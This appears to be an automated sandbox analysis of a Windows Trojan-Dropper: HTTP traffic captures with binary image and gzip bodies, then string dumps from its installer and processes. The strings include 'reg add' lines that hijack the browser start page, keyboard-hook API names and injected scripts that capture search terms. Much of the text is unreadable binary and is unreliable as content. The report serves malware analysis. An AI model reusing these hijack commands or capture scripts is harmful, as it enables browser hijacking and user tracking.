User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; TheWorld)

Host: d.123.sogoucdn.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.4.1

Date: Sun, 01 Jun 2014 03:33:25 GMT

Content-Type: image/gif

Content-Length: 1036

Last-Modified: Thu, 14 Nov 2013 11:00:56 GMT

Connection: keep-alive

Accept-Ranges: bytes
GIF89aQ.}..........1..b.......................C.....t.................
............G...........j........}..T.................................
.................................................................!....
.).,....Q.}........(....r.l:...0E.Z...v..z...xL.o...z}-..p.;N.W.......
&. .z.waZ........z|W.........#.v.W.X!...u.)..Z$.$.q....\...{.U....[...
j.....Z..........[....d...\....f...[. .i.).!X..e.....).......]Q0......
...%..@$"(.8....t.b..q#.......e...C..\..%..B..|.sK..NPz..E.......8s...
.T..R.q.SYO9:..u...U?^......k.j.J...Bb..%....H`...jv......i...Z...~.\O
.R..*x.B..R...(V..L..]4..<./.5."...q.d.....@ sT........k1..W.R[N...
ws....p9.../n....Y.3'C....b*D..8M.........w......PM...N..-.}......b.~.
...w.}..h....WE}...`...W`9`=.!.U1x.n....\.]h.TU.". ."2.Z..aXF.m<U.s
.)7..Z.H..Z...R..H..d...........6b]D...i....^U.x.`P.yW.m.uT..eya.t..#G
f...aj..Q......V..d.^....brE..|..e.y....".D.N>....C...N9E..M..1.I..
*....j...r.. ...E"[email protected].... -.l.....#........0..4.j
P.5.\.-...#N.....:..#)@<..k.=.......K.A.....V8..D..,....l... ...;font>....

GET /ads_hz/_ads_2.js?t=778653 HTTP/1.1

Accept: */*

Referer: hXXp://123.sogou.com/?22014

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; TheWorld)

Host: d.123.sogoucdn.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.4.1

Date: Sun, 01 Jun 2014 03:33:26 GMT

Content-Type: application/x-javascript

Last-Modified: Sun, 01 Jun 2014 03:00:03 GMT

Transfer-Encoding: chunked

Connection: keep-alive

Content-Encoding: gzip
d48.............Y.o.F.. ....J.H.aI4.8...h..&..p...W.c.dI..l...7.|.u...
.%>fwg...fv....<..H....T...}'...>B....e.....:../.7N.7...sU.7z
..O...../...V..x.^.(..q|.pg.f.k.l.&\]imf'n.tz6k....'..c.V..&A.3.n.<
~....<."_....[-.q....Wn.A,....D_.Y>eL..cO.J.M.y..*DY....rK...._.
r.1..:..Jml.2...7. ..b....,...L{zb.sG...~uQ..t.*n.....~..\>.W...K.T
.J......*!.../..../O...>.T...7?h.......Ri(.z....k.F.F.0...U..7.....
.<..9W{...Y....k=.SB.p.2..i....,..5@\..{.....paJ.A.i...[h6...._3...
.-..#|.j...<..Ga.z.].4.Sq...4wJ.a.......#.....#$.R...u.f.....&i....
..^.-...J..|.py5.=y.zw..m..V...y.......X../.#p9....1...... .^5..n.<
Z.=a.....T...D.w..i.,..\..k....^..J.n....T.#?_...no.m9z......~..?/T6e.
.,...x,G.Z[).r.P..l=..T5:[8..a.......m....~_...V~.n:.S*. A.T......{.v.
n.M...u...Sn Q.e...._....n......w!..'....}...J.u.y.=..N8...j.Vp4l..Y..
.......V..7Dp.s.-..~....s....."....R.r7.s0....=.k;..f.*.U..6_....0~..@
M.M...v..7..OMR.Ze.........o.y.......jW7OO...1^.S...F.u..'...0...C....
.V..'6.|.i..........Q.L.V P.i.:..E..R.|R...\x...L....AtG.{.....z..!'. 
...q..s7.i.......0..:.2'.f."..}[email protected]
n.{.....6C.c......Sy......h.3.]............7...:[email protected]..._|...H;.4.#
.o....!...I..a.....\......g..([email protected]>K.,.l..fH
........r....U...>.#..7<s.w~..#..NC..@.....,..^.,......6&.......
vl...5f.....x..4fB.\..d...r_}..|....w.."[email protected]:P.U.
.B(Nx......#g....j....9.o....i..6{"... .V...l...^z.u.....[.Q.F0...}..X
.6....../W....OO.{..n...:...O....z./.K...B.%#...?}..9:.g_.<Wd..<<< skipped >>>

GET /v53/imgn/guide_tip.png HTTP/1.1

Accept: */*

Referer: hXXp://123.sogou.com/?22014

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; TheWorld)

Host: d.123.sogoucdn.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.4.1

Date: Sun, 01 Jun 2014 03:33:31 GMT

Content-Type: image/png

Content-Length: 10442

Last-Modified: Thu, 14 Nov 2013 11:00:56 GMT

Connection: keep-alive

Accept-Ranges: bytes
.PNG........IHDR.......J.......D.....tEXtSoftware.Adobe ImageReadyq.e&
lt;...$iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCe
hiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk=
"Adobe XMP Core 5.0-c061 64.140949, 2010/12/07-10:57:01        "> &
lt;rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
 <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1
.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http:/
/ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photo
shop CS5.1 Macintosh" xmpMM:InstanceID="xmp.iid:CEC0416D02FB11E388CB8B
2E3040A42A" xmpMM:DocumentID="xmp.did:CEC0416E02FB11E388CB8B2E3040A42A
"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:CEC0416B02FB11E3
88CB8B2E3040A42A" stRef:documentID="xmp.did:CEC0416C02FB11E388CB8B2E30
40A42A"/> </rdf:Description> </rdf:RDF> </x:xmpmeta&
gt; <?xpacket end="r"?>.Z....%<IDATx..].....&.(..."...ky.....
.f...7..........W@%.`..@A.*(...P..;K......E|..;g.....?[....>.<..
...........i......h-....@_~.. _&.2%...<..........k......w.d./.....U
 8..r./=|..9.{.P .IT.r.J.b].|...3|....../7....]1..=?..M]Y.f.....n...7l
.:w......Vk?.gkk 8.z..........ps...^p........P-....Z..._.6l.....KWWW.j
jj...........Q..P.~.|..Y..O......... .}...GI...3k..#......KS.....n..r.
rm..../.....'JUUU..aIT....V......4...]P.......M.....Y..xju6...2...|.o3
......?...>X\..V[[......}(//........o.CEM...f.N..Z.....O. ..7hU.qC=
p&/........@.|'gA.1.>.$....{@t..P...um..A..8..].v.;..D.b.]..ss.<<< skipped >>>

GET /stat.htm?id=5645354&r=http://VVV.mdtxw.org/miniindex/&lg=en-us&ntime=1401593629&repeatip=2&rtime=0&cnzz_eid=1321967991-1401593629-&showp=1024x768&st=-17586&sin=none&t=undefinedundefinedundefined&rnd=25106375 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/meinv.htm?time=undefined

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: hzs10.cnzz.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: Tengine/1.4.1

Date: Sun, 01 Jun 2014 03:33:52 GMT

Content-Type: image/gif

Content-Length: 43

Last-Modified: Tue, 28 May 2013 02:57:17 GMT

Connection: close

Accept-Ranges: bytes

GIF89a.............!.......,...........D..;..

GET /core.php?web_id=5645354&t=z HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/xinwen.htm?time=undefined

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: c.cnzz.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: Tengine

Date: Sun, 01 Jun 2014 03:33:50 GMT

Content-Type: application/javascript

Transfer-Encoding: chunked

Connection: keep-alive

Last-Modified: Sun, 01 Jun 2014 03:33:50 GMT

Expires: Sun, 01 Jun 2014 03:48:50 GMT
31e..!function(){var a,b,c,d=encodeURIComponent,e="5645354",f="",g="",
h="online_v3.php",i="z12.cnzz.com",j="1",k="text",l="z",m="站
8271;统计",n=window["_CNZZDbridge_" e].bobject,o="https:"=
=document.location.protocol?"https:":"http:",p="0",q=o "//online.cnzz.
com/online/" h,r=[];r.push("id=" e),r.push("h=" i),r.push("on=" d(g)),
r.push("s=" d(f)),q ="?" r.join("&"),"0"===p&&n.callRequest([o "//cnzz
.mmstat.com/9.gif?abc=1"]),j&&(""!==g?n.createScriptIcon(q,"utf-8"):(b
="z"==l?"hXXp://VVV.cnzz.com/stat/website.php?web_id=" e:"hXXp://quanj
ing.cnzz.com","pic"===k?(c=o "//icon.cnzz.com/img/" f ".gif",a="<a 
href='" b "' target=_blank title='" m "'><img border=0 hspace=0 
vspace=0 src='" c "'></a>"):a="<a href='" b "' target=_bla
nk title='" m "'>" m "</a>",n.createIcon([a])))}();...0..

The Trojan-Dropper connects to the servers at the folowing location(s):

%original file name%.exe_464:

.text

`.rdata

@.data

.ndata

.rsrc

uDSSh

.DEFAULT\Control Panel\International

Software\Microsoft\Windows\CurrentVersion

GetWindowsDirectoryA

KERNEL32.dll

ExitWindowsEx

USER32.dll

GDI32.dll

SHFileOperationA

ShellExecuteA

SHELL32.dll

RegEnumKeyA

RegCreateKeyExA

RegCloseKey

RegDeleteKeyA

RegOpenKeyExA

ADVAPI32.dll

COMCTL32.dll

ole32.dll

VERSION.dll

verifying installer: %d%%

http://nsis.sf.net/NSIS_Error

... %d%%

~nsu.tmp

%u.%u%s%s

RegDeleteKeyExA

%s=%s

*?|<>/":

DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf2.tmp\bind.dll

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf2.tmp\bind.dll

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf2.tmp

"#""""33338

33332""#333

de$%s[

nsf2.tmp

0, 0, 0)

S~1\Temp\nsf2.tmp

%original file name%.exe

c:\%original file name%.exe

%Program Files%\shandian"

%Program Files%\shandian

CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsa1.tmp

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\

Nullsoft Install System v2.45

%Documents and Settings%\%current user%\Start Menu\Programs\

%original file name%.exe_464_rwx_10004000_00001000:

callback%d

cmd.exe_1612:

.text

`.data

.rsrc

KERNEL32.dll

NTDLL.DLL

msvcrt.dll

USER32.dll

SetConsoleInputExeNameW

APerformUnaryOperation: '%c'

APerformArithmeticOperation: '%c'

ADVAPI32.dll

SHELL32.dll

MPR.dll

RegEnumKeyW

RegDeleteKeyW

RegCloseKey

RegOpenKeyW

RegCreateKeyExW

RegOpenKeyExW

ShellExecuteExW

CmdBatNotification

GetWindowsDirectoryW

GetProcessHeap

GetCPInfo

GetConsoleOutputCP

_pipe

GetProcessWindowStation

cmd.pdb

pauseelims=- tokens=1-2" %%e in ("%reglist1%") do (reg add %%a /v "%%e" /d %%f /f)

pause/f "delims=- tokens=1-2" %%e in ("%reglist1%") do (reg add %%a /v "%%e" /d %%f /f)

pausee" /d %%f /f)

pausefor /f "delims=- tokens=1-2" %%e in ("%reglist1%") do (reg add %%a /v "%%e" /d %%f /f)

pause (reg add %%a /v "%%e" /d %%f /f)

pauses=- tokens=1-3" %%b in ("%reglist2%") do (reg add %%a /v %%b /t %%c /d %%d /f)

for /f "delims=- tokens=1-2" %%e in ("%reglist1%") do (reg add %%a /v "%%e" /d %%f /f)

CMD Internal Error %s

)(&&())))(&))

)&((&)&))&())

)&((&)&)&()))

)(&&()))&))))

CMD.EXE

()|&=,;"

COPYCMD

\XCOPY.EXE

CMDCMDLINE

WKERNEL32.DLL

Software\Policies\Microsoft\Windows\System

0123456789

cmd.exe

DIRCMD

%d.%d.d

Ungetting: '%s'

DisableCMD

GeToken: (%x) '%s'

%s\Shell\Open\Command

%x %c

*** Unknown type: %x

Args: `%s'

Cmd: %s Type: %x

%s (%s) %s

r /f "delims=- tokens=1-2" %e in ("Start Page-"http://www.jlbnh.com" ") do (reg add %a /v "%e" /d %f /f)

/www.jlbnh.com"") do (reg add %a /v %b /t %c /d %d /f)

a /v "%e" /d %f /f

lbnh.com" "

A-08002B30309D}\shell\OpenHomePage\Command"

//www.jlbnh.com"

%Program Files%\shandian>

.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH

%WinDir%;%WinDir%\System32\Wbem;c:\Program Files\Wireshark

or /f "delims=- tokens=1-2" %%e in ("%reglist1%") do (reg add %%a /v "%%e" /d %%f /f)

CMDEXTVERSION

KEYS

%Program Files%\shandian

Press any key to continue . . .

ernet Explorer\Main" /v "Start Page" /d "http://www.jlbnh.com" /f

orer\iexplore.exe http://www.jlbnh.com" /f

%s %s

(%s) %s

%s %s%s

&()[]{}^=;!%' ,`~

d%sd%s

-%sd%sd%sd

d%sd%sd

%s=%s

X-X

.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS

<> -*/%()|^&=,

\CMD.EXE

Windows Command Processor

5.1.2600.5512 (xpsp.080413-2111)

Cmd.Exe

Windows

Operating System

5.1.2600.5512

Press any key to continue . . . %0

operable program or batch file.

The system cannot execute the specified program.

and press any key when ready. %0

Microsoft Windows XP [Version %1]%0

a pipe operation.

KEYS is on.

KEYS is off.

The process tried to write to a nonexistent pipe.

The switch /Y may be preset in the COPYCMD environment variable.

to prompt on overwrites unless COPY command is being executed from

Switches may be preset in the DIRCMD environment variable. Override

Quits the CMD.EXE program (command interpreter) or the current batch

CMD.EXE. If executed from outside a batch script, it

will quit CMD.EXE

ERRORLEVEL that number. If quitting CMD.EXE, sets the process

Displays or sets a search path for executable files.

Type PATH ; to clear all search-path settings and direct cmd.exe to search

Changes the cmd.exe command prompt.

$B | (pipe)

$V Windows XP version number

Displays, sets, or removes cmd.exe environment variables.

Displays the Windows XP version.

Tells cmd.exe whether to verify that your files are written correctly to a

Records comments (remarks) in a batch file or CONFIG.SYS.

Press any key to continue . . . %0

Directs cmd.exe to a labeled line in a batch program.

NOT Specifies that Windows XP should carry out

will execute the command after the ELSE keyword if the

I The new environment will be the original environment passed

to the cmd.exe and not the current environment.

SEPARATE Start 16-bit Windows program in separate memory space

SHARED Start 16-bit Windows program in shared memory space

If it is an internal cmd command or a batch file then

the command processor is run with the /K switch to cmd.exe.

If it is not an internal cmd command or batch file then

parameters These are the parameters passed to the command/program

under Windows XP.

Starts a new instance of the Windows XP command interpreter

CMD [/A | /U] [/Q] [/D] [/E:ON | /E:OFF] [/F:ON | /F:OFF] [/V:ON | /V:OFF]

/D Disable execution of AutoRun commands from registry (see below)

/A Causes the output of internal commands to a pipe or file to be ANSI

/U Causes the output of internal commands to a pipe or file to be

variable var at execution time. The %var% syntax expands variables

of an executable file.

If /D was NOT specified on the command line, then when CMD.EXE starts, it

either or both are present, they are executed first.

HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\AutoRun

HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun

can enable or disable extensions for all invocations of CMD.EXE on a

following REG_DWORD values in the registry using REGEDT32.EXE:

HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\EnableExtensions

HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions

particular invocation of CMD.EXE with the /V:ON or /V:OFF switch. You

can enable or disable completion for all invocations of CMD.EXE on a

HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\DelayedExpansion

HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion

at execution time.

CMD.EXE with the /F:ON or /F:OFF switch. You can enable or disable

completion for all invocations of CMD.EXE on a machine and/or user logon

the registry using REGEDT32.EXE:

HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\CompletionChar

HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\PathCompletionChar

HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar

HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar

Shift key with the control character will move through the list

&()[]{}^=;!%' ,`~

Command Processor Extensions enabled by default. Use CMD /? for details.

ASSOC [.ext[=[fileType]]]

.ext Specifies the file extension to associate the file type with

ASSOC .pl=PerlScript

FTYPE PerlScript=perl.exe %%1 %%*

script.pl 1 2 3

set PATHEXT=.pl;%%PATHEXT%%

The restartable option to the COPY command is not supported by

this version of the operating system.

The following usage of the path operator in batch-parameter

The unicode output option to CMD.EXE is not supported by this

version of the operating system.

If Command Extensions are enabled the DATE command supports

If Command Extensions are enabled the TIME command supports

If Command Extensions are enabled the PROMPT command supports

is pretty simple and supports the following operations, in decreasing

! ~ - - unary operators

* / %% - arithmetic operators

  - - arithmetic operators

&= ^= |= <<= >>=

If you use any of the logical or modulus operators, you will need to

values. If SET /A is executed from the command line outside of a

assignment operator requires an environment variable name to the left of

the assignment operator. Numeric values are decimal numbers, unless

occurrence of the remaining portion of str1.

Finally, support for delayed environment variable expansion has been

added. This support is always disabled by default, but may be

enabled/disabled via the /V command line switch to CMD.EXE. See CMD /?

of text is read, not when it is executed. The following example

So the actual FOR loop we are executing is:

%Í%% - expands to the current directory string.

%ÚTE%% - expands to current date using same format as DATE command.

%%CMDEXTVERSION%% - expands to the current Command Processor Extensions

%%CMDCMDLINE%% - expands to the original command line that invoked the

If Command Extensions are enabled the SHIFT command supports

control is passed to the statement after the label specified. You must

%%4 %%5 ...)

CMD /? for details.

This works because on old versions of CMD.EXE, SETLOCAL does NOT

command execution.

non-executable files may be invoked through their file association just

by typing the name of the file as a command. (e.g. WORD.DOC would

launch the application associated with the .DOC file extension).

When executing an application that is a 32-bit GUI application, CMD.EXE

the command prompt. This new behavior does NOT occur if executing

When executing a command line whose first token is the string "CMD "

without an extension or path qualifier, then "CMD" is replaced with

the value of the COMSPEC variable. This prevents picking up CMD.EXE

When executing a command line whose first token does NOT contain an

extension, then CMD.EXE uses the value of the PATHEXT

.COM;.EXE;.BAT;.CMD

When searching for an executable, if there is no match on any extension,

If Command Extensions are enabled, and running on the Windows XP

forms of the FOR command are supported:

Walks the directory tree rooted at [drive:]path, executing the FOR

passes the first blank separated token from each line of each file.

is a quoted string which contains one or more keywords to specify

different parsing options. The keywords are:

be passed to the for body for each iteration.

where a back quoted string is executed as a

FOR /F "eol=; tokens=2,3* delims=, " %%i in (myfile.txt) do @echo %%i %%j %%k

would parse each line in myfile.txt, ignoring lines that begin with

a semicolon, passing the 2nd and 3rd token from each line to the for

line, which is passed to a child CMD.EXE and the output is captured

IF CMDEXTVERSION number command

The CMDEXTVERSION conditional works just like ERRORLEVEL, except it is

CMDEXTVERSION conditional is never true when Command Extensions are

%%CMDCMDLINE%% will expand into the original command line passed to

CMD.EXE prior to any processing by CMD.EXE, provided that there is not

already an environment variable with the name CMDCMDLINE, in which case

%%CMDEXTVERSION%% will expand into a string representation of the

current value of CMDEXTVERSION, provided that there is not already

an environment variable with the name CMDEXTVERSION, in which case you

under Windows XP, as command line editing is always enabled.

CMD.EXE was started with the above path as the current directory.

UNC paths are not supported. Defaulting to Windows directory.

CMD does not support UNC paths as current directories.

UNC paths not supported for current directory. Using

to create temporary drive letter to support UNC current

Missing operand.

Missing operator.

The COMSPEC environment variable does not point to CMD.EXE.

The FAT File System only support Last Write Times

of a batch script is reached, an implied ENDLOCAL is executed for any

application execution.

The switch /Y may be present in the COPYCMD environment variable.

to prompt on overwrites unless MOVE command is being executed from

when CMD.EXE started. This value either comes from the current console

The COLOR command sets ERRORLEVEL to 1 if an attempt is made to execute

shandian.exe_476:

.text

`.rdata

@.data

.rsrc

SSSSh

RSSSSh

QSSSSh

SRjdPSSSSh

QSSSShD

PSSSSh

QSSSShC

SSShT

;;~%U

F\t SSh

FHSSh

VHSSh

F<%u?

t.SVP

unzip 1.01 Copyright 1998-2004 Gilles Vollant - http://www.winimage.com/zLibDll

<4,$?7/'

(3-!0,1'8"5.*2$

inflate 1.2.3 Copyright 1995-2005 Mark Adler

WINMM.dll

WS2_32.dll

IMM32.dll

VERSION.dll

GetWindowsDirectoryW

GetProcessHeap

KERNEL32.dll

GetKeyState

GetAsyncKeyState

EnumThreadWindows

EnumWindows

keybd_event

MapVirtualKeyW

EnumChildWindows

UnhookWindowsHookEx

SetWindowsHookExW

GetKeyboardLayoutNameW

LoadKeyboardLayoutW

GetKeyNameTextW

RegisterHotKey

UnregisterHotKey

USER32.dll

GDI32.dll

comdlg32.dll

RegCloseKey

RegOpenKeyW

RegCreateKeyW

RegDeleteKeyW

RegOpenKeyExW

RegGetKeySecurity

RegEnumKeyW

RegQueryInfoKeyW

RegSetKeySecurity

RegCreateKeyExW

ADVAPI32.dll

ShellExecuteExW

ShellExecuteW

SHFileOperationW

SHELL32.dll

ole32.dll

OLEAUT32.dll

CreateUrlCacheEntryW

CommitUrlCacheEntryW

GetUrlCacheEntryInfoW

InternetCrackUrlW

DeleteUrlCacheEntryW

HttpOpenRequestA

CommitUrlCacheEntryA

HttpAddRequestHeadersA

DeleteUrlCacheEntryA

FindCloseUrlCache

FindNextUrlCacheEntryA

UnlockUrlCacheEntryFileA

FindFirstUrlCacheEntryA

FindNextUrlCacheEntryW

UnlockUrlCacheEntryFileW

FindFirstUrlCacheEntryW

InternetCanonicalizeUrlW

FtpCommandW

FtpOpenFileW

HttpEndRequestW

HttpSendRequestExW

HttpOpenRequestW

FtpGetFileSize

HttpQueryInfoW

WININET.dll

DSOUND.dll

UrlCombineW

UrlIsOpaqueW

PathIsURLW

UrlGetPartW

SHDeleteKeyW

UrlCanonicalizeW

SHEnumKeyExW

UrlIsW

SHQueryInfoKeyW

SHLWAPI.dll

MSVCRT.dll

_acmdln

CoInternetCombineUrl

CoGetClassObjectFromURL

urlmon.dll

NETAPI32.dll

gdiplus.dll

WINTRUST.dll

COMCTL32.dll

URL=%s

_twpass

Content-Disposition: form-data; name="%s"

Content-Disposition: form-data; name="%s"; filename="%s"

cmdline

@%s#%s

%s%s; %s)

Referer: %s

msjava.dll

\msjava.dll

/uploaderapi2.swf

1.2.3

http://%s%s

HTTP/1.0

Mozilla/4.0

www1.baidu.com

www.baidu.com

baidu.com

.jpeg

\\.\PhysicalDrive%d

\\.\Scsi%d:

XXXXXX

ADD_DATE="%s"

LOVEFAV="%d"

LAST_MODIFIED="%s"

LAST_VISIT="%s"

%s=%s

%s=%s HTTPS=%s

0d

error %d with zipfile in unzCloseCurrentFile

error %d with zipfile in unzReadCurrentFile

extracting: %s

error opening %s

%s%s/

The file %s exists. Overwrite ? [y]es, [n]o, [A]ll:

error %d with zipfile in unzOpenCurrentFilePassword

creating directory: %s

error %d with zipfile in unzGetCurrentFileInfo

error %d with zipfile in unzGoToNextFile

error %d with zipfile in unzGetGlobalInfo

.html

.htm0

http:

NUL=%s

DIRNUL=%s

wininit.ini

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; TheWorld)

00000000000000000001

00000000000000000010

http= HTTPS=

var twFloatTimer%%s;

var twFloatEle%%s;

var twFloatEf%%s = "%ï";

function TWFloatFilterHide%%s( )

if( twFloatEf%%s == "0" )

twFloatEle%%s.removeNode( true );

if( twFloatEle%%s.filters.alpha.opacity > 30 )

twFloatEle%%s.filters.alpha.opacity-=30;

twFloatTimer%%s=window.setTimeout( "TWFloatFilterHide%%s()",100);

window.clearTimeout(twFloatTimer%%s);

twFloatEle%%s.filter="";

twFloatEle%%s.posWidth

twFloatEle%%s.posHeight

twFloatEle%%s.posLeft

twFloatEle%%s.posTop

twFloatEle%%s = document.getElementById( "%%id" );

if( twFloatEf%%s == "1" )

twFloatEle%%s.style.filter="Alpha(Opacity=100, FinishOpacity=0, Style=3)";

K0=http://*.google.c*/search?*q=*

S0=try{col=document.getElementsByName('q');external.SetSearchKey( %max_security_id,col[0].value );}catch (e) {}

K1=http://*.baidu.com/*?*=*

S1=try{col=document.getElementsByName('wd');var str;if( col.length )str= col[0].value;else{col=document.getElementsByName('word');if( col.length ){str

= col[0].value;}}if( str.length != 0 ){external.SetSearchKey( %max_security_id,col[0].value );}}

K2=http://search.live.com/*?q=*

S2=try{col=document.getElementsByName('q');external.SetSearchKey( %max_security_id,col[0].value );}catch (e) {}

SearchLeftPad=7

AdressLeftPad=8

****7@0**.32****

****23-**0@7****

<**19=?4****

****4?=91**<

(4**/8=?7 ***

*** 7?=8/**4(

****,**** ****

**** ****,****

44222222222

-.--.-..*)

$@/ 8"/

VS.iw1A<:7

this.isSel = false;

this.bg = this.create('div', '', {}, {'display': 'none', 'zoom': '1', 'filter': 'alpha(opacity=20)', 'backgroundColor': '#000000', 'position': 'absolute', 'zIndex': '998', 'textAlign': 'center', 'width': '100%', 'height': window.screen.availHeight   'px', 'left': '0px', 'top': parseInt(this.$dom.body.parentNode.scrollTop || 0, 10)   'px', 'margin': '0'});

this.pane = this.create('div', '', {'id': 'TW_Plugin_Vest_Pane'}, {'display': 'none', 'backgroundColor': '#FFFFFF', 'padding': '0', 'position': 'absolute', 'zIndex': '999', 'textAlign': 'left'});

this.$dom.body.appendChild(this.bg), this.$dom.body.appendChild(this.pane);

__$Effect.prototype = {

this.pane.innerHTML = '', this.pane.appendChild(b);

var el = this.$dom.createElement(tag);

for (var a in sty || {}) el.style[a] = sty[a];

txt && (el.innerHTML = txt), c && (el.onclick = c);

this.bg.style.display = 'none', this.pane.style.display = 'none', this.$dom.body.style.overflow = this.$dom.body.parentNode.style.overflow = '';

this.$dom.body.onselectstart = this.selEv || null;

setTimeout(function () {for(var i = 0; i < _tag('select').length; i   ) _tag('select')[i].style.visibility = 'visible';}, 1);

document.body.onkeypress = function () {

if(event.keyCode == 13)

URL_Openall();

document.body.scrollTop = 0;

return event.keyCode != 13;

fx && (this.fade(0, this.bg), this.fade(0), this.opacity = 0);

this.bg.style.display = '' , this.pane.style.display = '';

This.selEv = This.$dom.body.onselectstart, This.$dom.body.onselectstart = function() {return This.isSel;};

This.$dom.body.style.overflow = This.$dom.body.parentNode.style.overflow = 'hidden';

for(var i = 0; i < _tag('select').length; i   ) _tag('select')[i].style.visibility = 'hidden';

fx && (This.timer = window.setInterval(function () {

This.fade((This.opacity  = 10) / 100, This.bg);

if(This.opacity >= 20) {

clearInterval(This.timer);

This.fade(0.2, This.bg);

This.fade(0.99);

}, 100));

e = e || this.pane;

e.style.zoom = '1', e.style.filter = 'alpha(opacity='   parseInt(v >= 1 ? '99' : v * 100)   ')';

l && (this.pane.style.left = l   'px'), t && (this.pane.style.top = t   'px'), l == 0 && (this.pane.style.left = '0px'), t == 0 && (this.pane.style.top = '0px');

return (e || document).getElementsByTagName(t);

.white:link {font-size:12px;text-decoration:none;color: #eff8fb}

.white:visited {font-size:12px;text-decoration:none;color: #eff8fb}

.white:active {font-size:12px;text-decoration: none;color: #033B7D}

.white:hover {font-size:12px;text-decoration:none;color: #FF5A00}GIF89a6

A.cb:link {

A.cb:visited {

A.cb:active {

A.cb:hover {

.tlb {

.bb {

.bl {

background:url(callapse.gif) 90% 50% no-repeat;

background:url(callapse_hover.gif) 90% 50% no-repeat;

background:url(expand.gif) 90% 50% no-repeat;

background:url(expand_hover.gif) 90% 50% no-repeat;

var securityId = external.twGetSecurityID(window);

surl = "http://www.google.cn/search?client=aff-worldbrowser&channel=errorpage&forid=1&ie=utf-8&oe=UTF-8&hl=zh-CN&q="   encodeURI( searchtext.value );

window.open( surl );

surl = "http://www.baidu.com/baidu?word=" searchtext.value "&tn=ichuner_4_pg";

surl = "http://www.sogou.com/sogou?query=" searchtext.value "&pid=sogou-addr-6311b2f8bde6a1c3";

Function RequestQueryString( url, ArgName )

= trim(url)

If url = "" Or IsNull(url) Then

If IsObject(parent.location) Then

url = parent.location.href

url = location.href

url = location

nPos = InStr( LCase(url), LCase(ArgName) )

tmpArgVal = right( url, len(url)-nPos 1 )

If InStr( url, "?" ) > 0 Then

ArrTmp = split( url, "?" )

if err.number <> 0 then

err.clear

strUrl = RequestQueryString( url, "url" )

strDomain = RequestQueryString( url, "domain" )

strErrName = RequestQueryString( url, "code" )

document.getElementById("googleSE").value = _neSearchEngine.google;

document.getElementById("baiduSE").value = _neSearchEngine.baidu;

var news = document.getElementById('news');

var frame = document.getElementById("newsFrame");

frame.src = "http://www.fjmjm.com/web/frame_naverror.html";

news.style.display='block';

el.className='a_e';

external.SetOptionValue(securityId,"option","ep_related","1");

news.style.display='none';

el.className='a_c';

external.SetOptionValue(securityId,"option","ep_related","0");

if(document.getElementById("news").currentStyle.display == "block")

this.setDisplay(false,el);

this.setDisplay(true,el);

var defValue = external.GetOptionValue(securityId,"option","ep_related");

this.setDisplay(true,document.getElementById("displayCtrl"));

window.attachEvent("onload",function(){

DisplayMgr.init();

.in1{width: 220px;}

return window.external.twGetFormByIndex( window, "", nIndex );

formName = window.external.twGetFormDataInfo( window, "", formID, dataName );

window.external.twSetFormDataInfo( window, "", formID, "tw_formName", formName );

window.external.twUnInitFormData( window, "", 0 );

pObj = window.event.srcElement;

pObj.style.color=_tabhottextcolor;

pObj.style.color=_tabtextcolor;

